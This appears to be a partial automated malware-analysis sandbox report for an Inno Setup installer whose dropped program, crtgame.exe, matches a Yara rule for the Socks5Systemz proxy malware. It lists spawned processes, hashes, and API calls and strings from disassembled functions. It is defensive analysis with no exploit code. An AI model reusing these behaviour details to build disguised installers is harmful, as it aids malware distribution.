Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\schtasks.exe" /Query
Imagebase:	0x210000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:52:04
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:52:04
Start date:	14/12/2024
Path:	C:\Program Files (x86)\CRTGame\crtgame.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
Imagebase:	0x400000
File size:	2'195'454 bytes
MD5 hash:	A158C99AA92F0E29ED84BB25976D4F7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:52:04
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net.exe" helpmsg 10
Imagebase:	0x1c0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:52:04
Start date:	14/12/2024
Path:	C:\Program Files (x86)\CRTGame\crtgame.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
Imagebase:	0x400000
File size:	2'195'454 bytes
MD5 hash:	A158C99AA92F0E29ED84BB25976D4F7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	18:52:04
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:52:04
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 helpmsg 10
Imagebase:	0x390000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	1499
Total number of Limit Nodes:	22

Executed Functions

Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409B42
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669

Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6

Strings

SetDllDirectoryW, xrefs: 00404589
kernel32.dll, xrefs: 0040457D
SetSearchPathMode, xrefs: 0040459F
SetProcessDEPPolicy, xrefs: 004045B5

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 0040A0F4

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C4C), ref: 0040966C

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
SetWindowLongA.USER32(0001043A,000000FC,00409918), ref: 0040A148
RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
73A25CF0.USER32(0001043A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248

Strings

STATIC, xrefs: 0040A12A
/SL5="$%x,%d,%d,, xrefs: 0040A188
InnoSetupLdrWindow, xrefs: 0040A125

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLastWindow$CreateDirectoryLongRemove
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3341979996-3001827809
Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4

Strings

shell32.dll, xrefs: 00409110
kernel32.dll, xrefs: 004090BF, 004090D9
Wow64DisableWow64FsRedirection, xrefs: 004090BA
Wow64RevertWow64FsRedirection, xrefs: 004090D4

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
SetWindowLongA.USER32(0001043A,000000FC,00409918), ref: 0040A148

Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94

Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000,00409A77), ref: 00409A14
Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000), ref: 00409A28
Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90), ref: 00409A5C

RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
73A25CF0.USER32(0001043A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248

Strings

STATIC, xrefs: 0040A12A
/SL5="$%x,%d,%d,, xrefs: 0040A188
InnoSetupLdrWindow, xrefs: 0040A125

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 978128352-3001827809
Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000,00409A77), ref: 00409A14
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000), ref: 00409A28
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90), ref: 00409A5C

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C4C), ref: 0040966C

Strings

D, xrefs: 004099EE

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB

Strings

y@, xrefs: 00409FB4
.tmp, xrefs: 00409EF1

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB

Strings

y@, xrefs: 00409FB4
.tmp, xrefs: 00409EF1

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F

Strings

.tmp, xrefs: 0040935F

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406FAA
LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
